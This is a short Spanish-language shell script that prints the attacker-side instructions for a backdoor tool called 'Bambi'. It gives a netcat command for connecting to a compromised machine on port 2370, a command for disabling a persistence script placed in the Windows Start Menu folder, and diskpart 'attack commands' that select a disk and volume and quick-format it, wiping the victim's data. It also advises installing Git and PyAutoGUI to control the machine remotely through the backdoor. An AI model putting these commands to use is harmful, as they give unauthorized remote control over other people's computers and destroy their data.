echo "----------------------Bambi | Atacante----------------------"
echo "* Comando de conexion    :    netcat 192.168.1.? 2370"
echo "* Comandos de desactivacion    :"
echo "cd %UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Bambi"
echo "python disable.py"
echo "* Comandos de ataque    :"
echo "list disk"
echo "select disk 2 (Reemplace el 2 por el número de tu disco)"
echo "list volume"
echo "select volume 10 (Reemplace el 10 por el número de volumen de la partición que desea formatear)"
echo "format fs=ntfs quick"
echo "------------------------------------------------------------"
echo "[*] Instale Git para quie puedas instalar paquetes directamente desde la puerta trasera"
echo "[*] Instale PyautoGUI para que puedas usar sus funciones con python de forma remota"
echo "Fue un placer trabajar con bambi v‿v"
echo "bye, saluda a d4kox de mi parte. Soy d4kit0 v_X"